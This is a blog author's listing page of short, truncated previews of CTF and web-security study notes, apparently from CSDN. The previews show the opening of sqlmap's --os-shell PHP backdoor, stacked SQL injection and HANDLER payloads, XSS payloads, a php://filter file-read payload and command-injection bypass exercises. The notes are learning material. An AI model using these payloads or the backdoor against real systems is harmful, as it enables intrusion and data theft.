![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
笔记
_Stary
这个作者很懒,什么都没留下…
展开
-
sqlmap
sqlmapSqlmap使用详解 - 安全客,安全资讯平台 (anquanke.com)路径是绝对路径,且可以写入文件sqlmap --os-shell会生成两个php文件一个是文件上传,一个是后门文件。。。//后门<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set("max_execution_time",0);$z=@ini_get("disable_functions");if(!e原创 2021-09-22 16:53:38 · 200 阅读 · 0 评论 -
php特性
php特性正则解释器:https://regexper.com/在线转码:https://www.matools.com/hexweb89<?phpinclude("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(原创 2021-07-20 21:24:28 · 260 阅读 · 2 评论 -
命令注入ctfshow
title: CTFshow命令注入date: 2021-07-15tags: [ctf]description: 刷题记录搜索引擎http://helosec.com/正则解释https://regexper.com/web31<?phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/.原创 2021-07-20 21:21:36 · 415 阅读 · 0 评论 -
审 强网先锋 赌徒 来学反序列化
审 强网先锋 赌徒 来学反序列化<meta charset="utf-8"><?phperror_reporting(1);class Start{ public $name='guest'; public $flag='syst3m("cat 127.0.0.1/etc/hint");'; public function __construct(){ echo "I think you need /etc/hint原创 2021-07-20 21:15:23 · 127 阅读 · 0 评论 -
PHP Parametric Function RCE(套娃)
PHP Parametric Function RCE无参数RCEif(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']);}/[^\W]+\((?R)?\)/ #R为正则本身例题<?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){ if (!原创 2021-07-20 21:13:54 · 255 阅读 · 0 评论 -
preg_replace
<?php$id = $_GET['id'];$_SESSION['id'] = $id;function complex($re, $str) { return preg_replace( '/(' . $re . ')/ei', 'strtolower("\\1")', $str );}foreach($_GET as $re => $str) { echo complex($re, $str). "\.原创 2021-07-20 21:13:22 · 91 阅读 · 0 评论 -
# php反序列化
php反序列化PHP反序列化的漏洞,通过控制read()读取flag.php的内容。<?php include("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename =原创 2021-07-19 22:20:26 · 61 阅读 · 0 评论 -
# SQL
SQLload_file()函数读取一个文件并将其内容作为字符串返回 其中file_name是文件的完整路径。堆叠注入1';show databases;#1';show tables;#1';show columns from FlagHere;#1'; HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;#一个知识点:HANDLER … OPEN语句打开一个表,使其可以使用后续原创 2021-07-17 21:16:03 · 75 阅读 · 0 评论 -
# php反序列化
php反序列化PHP反序列化的漏洞,通过控制read()读取flag.php的内容。<?php include("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename =原创 2021-07-17 21:15:31 · 82 阅读 · 0 评论 -
# XSS闯关
XSS闯关思路:闭合事件闭合标签xss语句οnclick=alert(1)<a href=javascript:alert(‘xss’)>level 1直接输入level 2输入查看源码发现被转义 无法注入<>在源码这边搞事情,前后闭合"><script>alert('xss')</script>level 3'οnclick='alert(“xss”)'()未转义转义”<>level 4"οnclick原创 2021-07-17 21:13:36 · 121 阅读 · 1 评论 -
写题记录
写题记录先看代码<?php error_reporting(0);if(!sizeof($_GET))highlight_file(__FILE__);?><?=(ob_end_flush()?"":""),(ob_start()?"":"")?><?=array_pop($_GET);?><?=(ob_start(ob_get_clean())?array_pop($_GET):""),"",(ob_end_flush()?"":"")?>原创 2021-06-11 00:06:13 · 97 阅读 · 0 评论 -
PTA-c++刷题记录
还没对答案,两天后记得来对答案1-1函数的参数个数和类型都相同,只是返回值不同,这不是重载函数。T1-2重载函数可以带有默认值参数,但是要注意二义性。T1-3多数运算符可以重载,个别运算符不能重载,运算符重载是通过函数定义实现的。T1-4对每个可重载的运算符来讲,它既可以重载为友元函数,又可以重载为成员函数,还可以重载为非成员函数。F1-5对单目运算符重载为友元函数时,可以说明一个形参。而重载为成员函数时,不能显式说明形参。T1-6重载运算符可以保持原运算符的优先级和结合性不变。T原创 2021-06-09 12:13:47 · 276 阅读 · 0 评论 -
[极客大挑战 2019]Knife
[极客大挑战 2019]Knife打开网页一句话木马,尝试连接抱歉,没有菜刀,但是有蚁剑连接成功翻目录找到flag刀呢??原创 2021-06-07 12:36:25 · 41 阅读 · 0 评论 -
[极客大挑战 2019]Secret File
[极客大挑战 2019]Secret File查看源码点secret继续查看源码没发现什么东西回退抓个包看看有一个secr3t.php去打开有个flag.php打开很调皮,退回去看代码,猜测有文件包含漏洞过滤了…/ tp input date用伪协议payload ?file=php://filter/read=convert.base64-encode/resource=flag.php用base64解码得到flag...原创 2021-06-07 00:26:39 · 62 阅读 · 1 评论 -
[极客大挑战 2019]Havefun
[极客大挑战 2019]Havefun查看源码有一段php代码传参?cat=dog成功撸猫原创 2021-06-07 00:13:56 · 58 阅读 · 0 评论 -
[极客大挑战 2019]EasySQL
[极客大挑战 2019]EasySQL点开链接简单的sql注入尝试万能密码 1’ or 1 = 1 #得到flag这是我做过最简单的题了原创 2021-06-05 18:24:21 · 53 阅读 · 0 评论 -
[HCTF 2018]WarmUp
[HCTF 2018]WarmUp一些函数empty() 函数用于检查一个变量是否为空。bool empty ( mixed $var )当 var 存在,并且是一个非空非零的值时返回 FALSE 否则返回 TRUE。以下的变量会被认为是空的:"" (空字符串)0 (作为整数的0)0.0 (作为浮点数的0)"0" (作为字符串的0)NULLFALSEarray() (一个空数组)$var; (一个声明了,但是没有值的变量)is_string函数is_string ( mix原创 2021-06-05 18:02:46 · 282 阅读 · 1 评论 -
2021-05-29
5-29今日摸鱼晚上打完游戏10.30开始看爬虫,看崔庆才的爬虫教程。看完正则表达式后实操爬猫眼top100遇见问题1 无法打印电影信息我猜应该是请求头的原因就想用bp抓一下包但是bp这是啥代理没连上2 bp代理没接上时间12.30舍友催我睡觉,我把电脑关了上床,问了一下同学,可能是端口被占用了,我用pad打开向日葵,改了改,最后是因为端口前面那个√没有打上,真是SB。然后拿着user-agent去做header。发现还是不行,检查一下,发现网页要验证,然后在CSDN上查其他佬的博文,发现原创 2021-05-29 02:32:23 · 206 阅读 · 2 评论